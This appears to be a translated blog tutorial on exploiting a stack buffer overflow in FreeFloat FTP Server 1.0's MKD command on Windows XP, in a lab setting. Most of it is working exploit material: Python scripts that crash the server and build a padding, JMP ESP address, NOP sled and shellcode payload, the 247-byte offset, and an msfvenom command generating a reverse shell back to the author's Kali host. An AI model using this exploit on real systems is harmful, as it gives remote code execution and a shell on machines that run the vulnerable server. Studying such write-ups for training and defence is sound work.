FreeFloat FTP Server 1.0 exploit and EXP writing

First open the FreeFloat FTP Server 1.0 binary, which has a stack buffer overflow, in OllyDbg (ODB) and press F9 so the vulnerable program runs under the debugger.
Then use the pattern_create.rb script that ships with Kali (part of Metasploit) to generate a string in which no four-byte sequence repeats; sending that string instead of plain 'A's is what lets us measure the buffer size in the next step.
The script lives in the Kali Metasploit install under

/usr/share/metasploit-framework/tools/exploit/

(it is also on the PATH as msf-pattern_create). From that directory, run

./pattern_create.rb -l 1000

to generate a 1000-byte string. We will send this string to the server to test the buffer size.

Then write the following python script

#!/usr/bin/env python3
# Send the 1000-byte pattern_create output as the MKD argument; the value that
# lands in EIP at the crash tells us which bytes of the buffer overwrote the
# saved return address.
from socket import socket, AF_INET, SOCK_STREAM

# Output of ./pattern_create.rb -l 1000
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('172.16.104.250', 21))
sock.recv(1024)                                    # server banner
sock.send(b"USER anonymous\r\n")
sock.recv(1024)
sock.send(b"PASS anonymous\r\n")
sock.recv(1024)
sock.send(b"MKD " + payload.encode() + b"\r\n")   # the overflowing command
sock.recv(1024)
sock.send(b"QUIT\r\n")
sock.close()

When we run the script, the OllyDbg disassembly window goes blank. In OllyDbg, press Shift+F7 to pass the exception on to the program and read the error message in the status bar: the access violation is at address 69413269, in other words EIP has become 69413269. What happened is that our MKD argument overflowed a stack buffer and overwrote the saved return address, so when the vulnerable function returned, that value was popped into EIP. Nothing is mapped at 0x69413269, which is why the window is empty and no code executes. Note also that right after the return, ESP points at the bytes that immediately follow the overwritten return address, that is, at the rest of our payload.

To determine the length of the buffer, use the companion script pattern_offset.rb from the same directory, /usr/share/metasploit-framework/tools/exploit/ (also on the PATH as msf-pattern_offset):

./pattern_offset.rb -q 69413269

-q queries the position of the given value in the pattern. The value can be the EIP as the debugger shows it, which the script interprets as a little-endian 32-bit number, or the four characters themselves.


Note: if you do not run the program under OllyDbg, the Windows crash dialog still reports the faulting EIP, so the offset can be recovered the same way. Using payload = 'A'*1000 to confirm the overflow is not recommended: EIP then reads 0x41414141, which proves you control it but gives no way to tell which four bytes of the buffer landed there, so you cannot compute the buffer size from it.
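As an added example that is not part of the original post, here is a small re-implementation of what pattern_create.rb and pattern_offset.rb do, so the 247-byte result can be reproduced without Metasploit. The crash value 0x69413269 is the EIP observed above and 1000 is the pattern length used by the script above; the int-to-string conversion packs the value little-endian for the same reason the Metasploit script does.

```python
#!/usr/bin/env python3
# Added example (not from the original post): a re-implementation of
# pattern_create.rb and pattern_offset.rb so the 247-byte result can be
# reproduced without Metasploit. The crash value 0x69413269 is the EIP
# observed in the post; 1000 is the pattern length used by the script above.
import string
import struct

def pattern_create(length):
    """Cyclic 'Aa0Aa1Aa2...' string. Each 3-byte group is (upper, lower, digit)
    with the digit cycling fastest, so every 4-byte window is unique for the
    first 26*26*10*3 = 20280 bytes; that uniqueness is what makes the offset
    lookup unambiguous."""
    groups = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]

def pattern_offset(pattern, value):
    """Offset of `value` in `pattern`, or -1 if absent.
    `value` is either the 4-character substring or the EIP value as an int
    (e.g. 0x69413269). An int is packed little-endian: the debugger shows the
    register as a number, but the four characters sat in memory in reverse
    byte order before being popped into EIP."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    return pattern.find(needle)

if __name__ == "__main__":
    pat = pattern_create(1000)
    print(pat)                                                       # same string as the script above sends
    print("offset of 0x69413269:", pattern_offset(pat, 0x69413269))  # 247
```

The little-endian packing is the detail people most often get wrong when doing this by hand: 0x69413269 is the characters "i2Ai", not "iA2i", and "i2Ai" first occurs at offset 247, one byte after the group "Ai2".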

So the buffer is 247 bytes: bytes 248 to 251 of our input overwrite the saved return address and become EIP when the function returns. That is the essence of this stack buffer overflow: the value loaded into EIP is under our control. The goal is therefore to choose a return address that sends execution into the part of our input that follows the return address, and to place our shellcode there.

The return address does not have to land exactly on the first byte of the shellcode. After the ret instruction pops our value into EIP, ESP points at the bytes immediately after the overwritten return address, that is, at the rest of our payload. If EIP points at a JMP ESP instruction that already exists somewhere in the process, the jump lands inside our buffer without us having to know the stack address in advance, and a short NOP sled in front of the shellcode absorbs any small misalignment.

The target here is Windows XP, which has no ASLR: the system DLLs loaded into the process (kernel32.dll, and user32.dll for GUI programs) sit at the same addresses on every run, so a JMP ESP found once in a loaded module can be hardcoded. On Vista and later, ASLR randomizes module bases, and this approach only works with a module that was built without ASLR support. Here we simply used OllyDbg to search the loaded modules for the instruction.

The machine code of JMP ESP is the two bytes FF E4. When searching a module's bytes by hand, for instance by looping over the image behind the handle returned by LoadLibrary, the condition is buf[pos] == 0xFF && buf[pos+1] == 0xE4.

The address found here is 0x77c21025. x86 is little-endian, so in the script it is written byte-reversed as \x25\x10\xc2\x77.

Then add a NOP sled (\x90 bytes) after the return address, so that the jump slides into the shellcode wherever in the sled it lands, and finally append the shellcode generated by msfvenom. The command is

msfvenom -p windows/shell_reverse_tcp LHOST=<local IP> LPORT=<listening port> -b '\x00\x0a\x0d' -f py -o 1.py

-b lists the bad characters that the encoder must keep out of the shellcode: \x00 terminates a C string, \x0a is the line feed and \x0d the carriage return, and the server treats any of them as the end of the MKD command line, which would truncate the payload. -f py emits the shellcode as a Python string and -o writes it to the named file.
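The steps above (find a JMP ESP, write its address little-endian, put a NOP sled and the shellcode after it, keep bad characters out) fit together as follows. This is an added example, not the post's own final script, which survives only as a screenshot. It goes slightly beyond the text in two ways: it returns every FF E4 hit in the module rather than the first, and it checks the return address for bad characters as well as the shellcode. The module image is a constructed stand-in for a DLL dump, laid out so that the hit is the post's 0x77c21025, and the shellcode is a placeholder of INT3 breakpoints (\xcc), a standard way to confirm in OllyDbg that the jump lands before substituting the msfvenom output from 1.py.

```python
#!/usr/bin/env python3
# Added example, not the post's final script (which survives only as a
# screenshot). It chains the remaining steps: locate JMP ESP (FF E4) in a
# module image, pack the address little-endian, and lay the buffer out as
# [247 bytes of padding][return address][NOP sled][shellcode], refusing any
# byte from the bad-character list. Assumptions, not from the post: the
# module image is a constructed stand-in for a DLL dump, placed so the hit is
# the post's 0x77c21025; the shellcode is a placeholder of INT3 breakpoints
# (\xcc) so the jump can be confirmed in OllyDbg before the msfvenom output
# from 1.py is substituted.
import socket
import struct

OFFSET = 247                  # bytes before the saved return address
JMP_ESP = b"\xff\xe4"         # opcode bytes of JMP ESP
BAD_CHARS = b"\x00\x0a\x0d"   # NUL, LF, CR: each would cut the MKD line short

def find_jmp_esp(image, base):
    """All virtual addresses in `image` (a module's bytes mapped at `base`)
    where FF E4 occurs, i.e. every usable JMP ESP in that module."""
    hits, pos = [], image.find(JMP_ESP)
    while pos != -1:
        hits.append(base + pos)
        pos = image.find(JMP_ESP, pos + 1)
    return hits

def bad_chars_in(data, bad=BAD_CHARS):
    """Set of bad byte values present in data (empty set means it is clean)."""
    return {b for b in data if b in bad}

def build_payload(ret_addr, shellcode, nops=16):
    """Assemble the MKD argument. The return address is checked too: an
    address containing 0x00, 0x0a or 0x0d cannot be delivered over FTP."""
    ret = struct.pack("<I", ret_addr)       # 0x77c21025 -> b"\x25\x10\xc2\x77"
    for name, part in (("return address", ret), ("shellcode", shellcode)):
        found = bad_chars_in(part)
        if found:
            raise ValueError(f"{name} contains bad characters: "
                             + ", ".join(f"\\x{b:02x}" for b in sorted(found)))
    return b"A" * OFFSET + ret + b"\x90" * nops + shellcode

def send_exploit(host, port, payload):
    """Same FTP dialogue as the pattern script: anonymous login, then MKD."""
    s = socket.create_connection((host, port))
    s.recv(1024)
    s.send(b"USER anonymous\r\n"); s.recv(1024)
    s.send(b"PASS anonymous\r\n"); s.recv(1024)
    s.send(b"MKD " + payload + b"\r\n")
    s.close()

# Constructed module dump: filler code bytes with a single JMP ESP at image
# offset 0x1025, so a base of 0x77c20000 gives the address used in the post.
MODULE_BASE = 0x77c20000
MODULE_IMAGE = b"\x55\x8b\xec\x90" * 0x409 + b"\x55" + JMP_ESP + b"\xc3\x90\x90"

if __name__ == "__main__":
    addrs = find_jmp_esp(MODULE_IMAGE, MODULE_BASE)
    print("JMP ESP at:", [hex(a) for a in addrs])            # ['0x77c21025']
    buf = build_payload(addrs[0], b"\xcc" * 4)
    print(len(buf), "bytes; EIP gets", buf[OFFSET:OFFSET + 4])
    # send_exploit("172.16.104.250", 21, buf)   # run only against the lab VM
```

Replace the b"\xcc" * 4 placeholder with the buf variable from 1.py once the breakpoint trips in OllyDbg; the bad-character check then runs over the real shellcode before anything is sent.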


Finally, add the generated shellcode string to the Python script.

Full code: shown as a screenshot in the original post.

Execution effect: shown as a screenshot in the original post.

172.16.104.250 is the vulnerable Windows XP host, my Kali machine is 172.16.104.3, and the listening port is 8086.

Origin blog.csdn.net/qq_27180763/article/details/123682143